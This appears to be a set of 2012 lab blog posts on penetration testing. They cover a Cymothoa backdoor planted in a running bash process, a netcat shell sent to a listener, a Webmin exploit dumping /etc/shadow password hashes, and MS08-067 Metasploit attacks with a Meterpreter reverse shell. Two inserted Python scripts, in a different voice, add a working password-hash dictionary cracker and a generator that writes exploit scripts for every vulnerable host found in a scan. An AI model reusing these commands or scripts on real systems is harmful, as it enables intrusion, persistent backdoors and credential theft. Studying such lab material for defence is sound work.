In this scenario we already have access to the victim and want to plant a backdoor with Cymothoa. In the Backtrack terminal, positioned at
root@bt:/pentest/backdoors/cymothoa#
I type
nc -l -v -p 8888 -e /bin/bash
Then I move to the victim's terminal and type
:~$ nc 192.168.56.1 8888 -e /bin/bash
and look at what happens in the Backtrack console:
Backtrack is listening and the victim has connected to it.
(Note: with -e /bin/bash on both ends the two shells are simply wired to each other and neither side gets a usable prompt; normally only the victim passes -e, giving a reverse shell, and the Backtrack side just listens with nc -l -v -p 8888.)
Then I move to the victim console, type ls to list this directory, and run the cymothoa binary with ./cymothoa
With cymothoa running in the victim terminal, I suppose I can go on to set up the backdoor from this console; that is my assumption.
After entering cymothoa I type
ps -axu
to look at the running processes.
Then I run cymothoa with the syntax
./cymothoa -p <process ID of the bash shell> -s 0 <shellcode 0: bind /bin/sh to a port> -y <port the backdoor listens on>
./cymothoa -p 20575 -s 0 -y 8888
Cymothoa reports that the shell process has been infected: the backdoor now lives inside that bash process and listens on port 8888 on the injected host.
But I am still confused by this situation: is Backtrack now infected by Ubuntu, or is Ubuntu infected by Backtrack's Cymothoa!?
Tuesday, January 31, 2012
Crack Password with John The Ripper
After we have found password hashes we must crack them to recover the real passwords. This time I want to try to crack the passwords from the previous case.
I use John The Ripper.
After opening john, I copy the file named userpass (txt) into john's folder, because an article said this can improve cracking time, then I crack the passwords like this
After waiting, cracking the file gave no result, and I think the hash is too long, so I decided to crack a single hash with John the Ripper.
I waited a long time without a result, and I chose to abort the attempt, because I think there is no matching password in the dictionary word list.
Exploitation to Privilege Escalation
Information Gathering
Zenmap is used to look up which services and ports are open or running. The relevant part of the scan output:
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.021 days (since Mon Jan 30 17:27:33 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=209 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 00:58:10 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.0.21
NSE: Script Post-scanning.
Initiating NSE at 17:58
Completed NSE at 17:58, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
From this I suppose a web application is running, so I open that IP in my browser and find that the web page on the server is active; so I want to penetrate this server through whatever the web side offers.
Vulnerability Assessment and Identification
Then the Nessus vulnerability scan:
It gives the vulnerability level of the target and more detail on the services running.
Following up on port 10000, the web application:
Nessus reports that the Webmin application has a vulnerability.
Exploitation
Metasploit
msf > search webmin
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > set LPORT 10000
LPORT => 10000
msf auxiliary(file_disclosure) > set LHOST 192.168.0.27
LHOST => 192.168.0.27
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
Note that this auxiliary module only uses RHOST and RPORT (which defaults to 10000); the LHOST and LPORT values set above are ignored. Looking at the contents of /etc/passwd, I have not obtained any password: the x in the second field means the hashes are kept in /etc/shadow. So I should try Exploit-DB, searching for the keyword Webmin, which I suspect is vulnerable.
I tried the Exploit-DB exploit this way (arguments: target host, port, and the file to read):
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
Now I have managed to get in and read the /etc/shadow file on the target server. Only the entries with a $1$ hash (root, vmware, obama, osama, yomama) are crackable; the accounts marked * or ! are locked. The next step is to crack those password hashes.
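The following is an added example, not part of the original posts (neither this one nor the John the Ripper post above that tries to crack these hashes): a small pure-Python dictionary check for $1$ md5crypt hashes like the ones dumped above. It reimplements crypt(3)'s md5crypt, parses shadow lines, skips locked accounts and tries each word of a wordlist against each hash, which is what john --wordlist does for this format. The root line is taken from the dump above; the demo account, its salt, the wordlist and all function names are constructed for the example. One caveat it makes visible: each guess costs 1000 MD5 rounds, so a run that ends with no result means the passwords are not in the wordlist, not that the hash is "too long"; the fix is a bigger list or john's rules, not waiting longer.

```python
# Added example (not from the original posts): a pure-Python dictionary check
# for $1$ md5crypt hashes such as those dumped from /etc/shadow above.
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: emit 6 bits at a time, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password, salt):
    """Compute a $1$ hash exactly as crypt(3) does (FreeBSD md5crypt, 1000 MD5 rounds)."""
    magic = b"$1$"
    salt = salt[:8]                      # crypt(3) uses at most 8 salt characters
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)            # mix in the alternate sum, 16 bytes per chunk
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(password)                  # historical quirk: one byte per bit of len(password)
    while bit:
        ctx.update(b"\0" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for rnd in range(1000):              # stretching loop: every guess costs 1000 MD5s
        c = hashlib.md5()
        c.update(password if rnd & 1 else final)
        if rnd % 3:
            c.update(salt)
        if rnd % 7:
            c.update(password)
        c.update(final if rnd & 1 else password)
        final = c.digest()
    groups = [                           # crypt(3)'s byte shuffle before encoding
        (final[0] << 16) | (final[6] << 8) | final[12],
        (final[1] << 16) | (final[7] << 8) | final[13],
        (final[2] << 16) | (final[8] << 8) | final[14],
        (final[3] << 16) | (final[9] << 8) | final[15],
        (final[4] << 16) | (final[10] << 8) | final[5],
    ]
    encoded = "".join(_to64(g, 4) for g in groups) + _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + encoded


def parse_shadow(text):
    """Return {user: hash} for crackable entries; '*', '!' or empty hashes mean a locked account."""
    targets = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, hashed = fields[0], fields[1]
        if hashed and hashed[0] not in "*!":
            targets[user] = hashed
    return targets


def check_wordlist(targets, words):
    """Try every word against every $1$ hash; returns {user: password} for matches."""
    cracked = {}
    for user, hashed in targets.items():
        parts = hashed.split("$")
        if len(parts) < 4 or parts[1] != "1":
            continue                     # only md5crypt is implemented here
        salt = parts[2].encode()
        for word in words:
            if md5crypt(word.encode(), salt) == hashed:
                cracked[user] = word
                break
    return cracked


# Constructed sample: the root line from the dump above, two locked system
# accounts, and a "demo" account whose hash is generated here so the answer is known.
DEMO_SALT = b"demosalt"
SAMPLE_SHADOW = (
    "root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::\n"
    "daemon:*:14040:0:99999:7:::\n"
    "sshd:!:14040:0:99999:7:::\n"
    "demo:" + md5crypt(b"letmein", DEMO_SALT) + ":14041:0:99999:7:::\n"
)
WORDLIST = ["123456", "password", "toor", "letmein"]   # stand-in for john's password.lst


def run_demo():
    return check_wordlist(parse_shadow(SAMPLE_SHADOW), WORDLIST)


if __name__ == "__main__":
    for user, password in run_demo().items():
        print(f"{user}:{password}")
```

To run it against the real dump, put the shadow lines in a file, read it into parse_shadow, and feed a proper wordlist; for anything beyond a few thousand words the same work is better left to john, which does it in compiled code with rules and session saving.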
Saturday, January 28, 2012
Metasploit With The Systematic Hacking Step
This article is an adjustment of the earlier article about Metasploit, reworked to follow the systematic steps.
Information Gathering :
Use Zenmap to identify the target's details.
The result of the scan is :
Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.06 ms 192.168.56.100
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
| Names
| XXX-8ADCB030A79<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XXX-8ADCB030A79<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.102
In the Zenmap result we can see the identification of the target.
The important information is:
Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3
The next step is
Service Enumeration :
The Zenmap result shows
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
We can see the services running on the target system.
Next is
Vulnerability Assessment and Identification :
I use Nessus to identify the vulnerabilities of the target.
The result of Nessus is
We can see 2 vulnerabilities were found, and I try to exploit them.
I found an interesting vulnerability here and want to try exploiting it against the target in Metasploit.
Exploitation :
I use the Metasploit console to exploit the target: open a terminal and type msfconsole
The next step is to match the vulnerability assessment data from Nessus to a Metasploit module; earlier I found the most interesting vulnerability to be MS08-067.
To get a Meterpreter session I use the MS08-067 exploit with the command
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST:
LHOST is my IP
RHOST is the target IP
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and type exploit to start the exploitation of the target.
Once we are in Meterpreter mode it means we have opened a hole into the target system with the payload we used; now we want a command prompt on the system to take full control of the target.
Use the syntax
meterpreter > execute -M -f cmd.exe
This command makes the target execute a command prompt (cmd.exe, from system32 on XP), and after that we are working inside the target's system32.
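As an added example that is not from the original post, the script below automates the three steps above: it parses Nmap's normal output (the Zenmap text shown earlier, embedded here as a constructed, abridged sample), keeps only the hosts that match the MS08-067 profile (fingerprinted as Windows XP with 445/tcp open), and writes the msfconsole resource script with the use / set PAYLOAD / set LHOST / set RHOST / exploit lines typed by hand above. The function names, the regular expressions and the LHOST value are the example's own.

```python
# Added example (not from the original post): turn Nmap's normal output into
# an msfconsole resource script for hosts matching the MS08-067 profile.
import re

# Constructed sample: an abridged copy of the Zenmap output shown above.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return {ip: {"ports": [...], "os": str|None}} from Nmap's normal (non-XML) output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # a new host section starts
            current = {"ports": [], "os": None}
            hosts[m.group(1)] = current
            continue
        if current is None:                     # preamble before the first host
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": (m.group(5) or "").strip(),
            })
        elif line.startswith("OS details:"):
            current["os"] = line.split(":", 1)[1].strip()
    return hosts


def ms08_067_candidates(hosts):
    """Hosts fingerprinted as Windows XP with 445/tcp open, the profile exploited above."""
    picked = []
    for ip, info in hosts.items():
        smb_open = any(p["port"] == 445 and p["proto"] == "tcp" and p["state"] == "open"
                       for p in info["ports"])
        if smb_open and info["os"] and "Windows XP" in info["os"]:
            picked.append(ip)
    return picked


def resource_script(targets, lhost):
    """Emit the msfconsole commands the post types by hand, one block per target."""
    lines = []
    for rhost in targets:
        lines += [
            "use exploit/windows/smb/ms08_067_netapi",
            "set PAYLOAD windows/meterpreter/reverse_tcp",
            f"set LHOST {lhost}",
            f"set RHOST {rhost}",
            "exploit",
        ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    print(resource_script(ms08_067_candidates(scan), "192.168.56.1"), end="")
```

Save the output to a file and start it with msfconsole -r targets.rc. The Nessus confirmation of MS08-067 still comes first: an XP fingerprint with 445 open only says the host is worth checking, not that the netapi patch is missing.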
And finally I succeeded in entering the XP system with Metasploit's Meterpreter.
Use Offline Database Exploit on Exploit-db
Exploit-DB on Backtrack is an offline arsenal of exploits kept in a local database: Backtrack Tools > Exploitation Tools > Open Source Exploitation > Exploit-DB > Exploit-DB Search
To search for an exploit we can use ./searchsploit <exploit name>
For example, to find out about smb exploits:
./searchsploit smb
I find a great many exploits for smb. To use one we need to match it to a vulnerability of the target found with Nessus (see the Nessus article). To run an exploit, look at the file extension: .py means the file is written in Python and is run with python <exploit file>; .rb is a Ruby file, run with ruby <exploit file>; .c is written in C and must be compiled first; .pl is written in Perl and is run with perl <exploit file>.
We can read an exploit file with the "cat" command.
I'll try one of those files as an example
and the result is
That exploit is for VLC media player; we can use it if the target has the matching vulnerability.
Vulnerability Report on Nessus
First I scanned the network in class with a scan named test1.
Click on test1 and press "Browse" to see the details of the target scan.
We can see how many vulnerabilities the target has; click on the IP to see more detail.
We can download the detailed result with the "download report" option, choosing the type of report to save; I chose "detailed HTML report", and the report is at this link: Nessus Report
Metasploit on Backtrack 5
Now I'll try to use the Metasploit console to exploit Windows XP SP3 on VirtualBox. First we need to know information about the victim, known in penetration testing as Information Gathering; we can use nmap, Zenmap, etc. to scan for candidate victims on the network.
Scanning Network
We can find the active hosts on the network; the victim has IP 192.168.56.102. After getting the IP we need to scan the target for vulnerabilities; here I use Nessus.
After opening Nessus, fill in the scan name, the policy, and the scan target with the victim's IP.
Press scan and wait for the result.
We can see the victim has 2 high-risk vulnerabilities; click on port 445 to look at the information in depth, like this
I look at the 2 vulnerabilities and choose the 2nd plugin: I tried to exploit the first one and failed, so I chose the 2nd, which is this
The plugin name is MS08-067. I looked for information about that vulnerability on Google, found it in the Metasploit module description, and tried to exploit it: open the Metasploit console with the terminal command #msfconsole
Use the exploit matching the Nessus result; the syntax in Metasploit is
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After setting the payload we need to specify the local host and the target with the syntax
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and run the exploit with the syntax
exploit
to enter Meterpreter mode.
Once we are in Meterpreter mode it means we have opened a hole into the target system with the payload we used; now we want a command prompt on the system to take full control of the target.
Use the syntax
meterpreter > execute -M -f cmd.exe
This command makes the target execute a command prompt (cmd.exe on XP), and after that we are working inside the target's system32.
To prove we have taken over the system, we create a folder in C:\
Use the command mkdir is2c at the C:\> prompt to make a folder on C:\
Creating the folder in C:\ succeeds, which means we have taken over the XP system.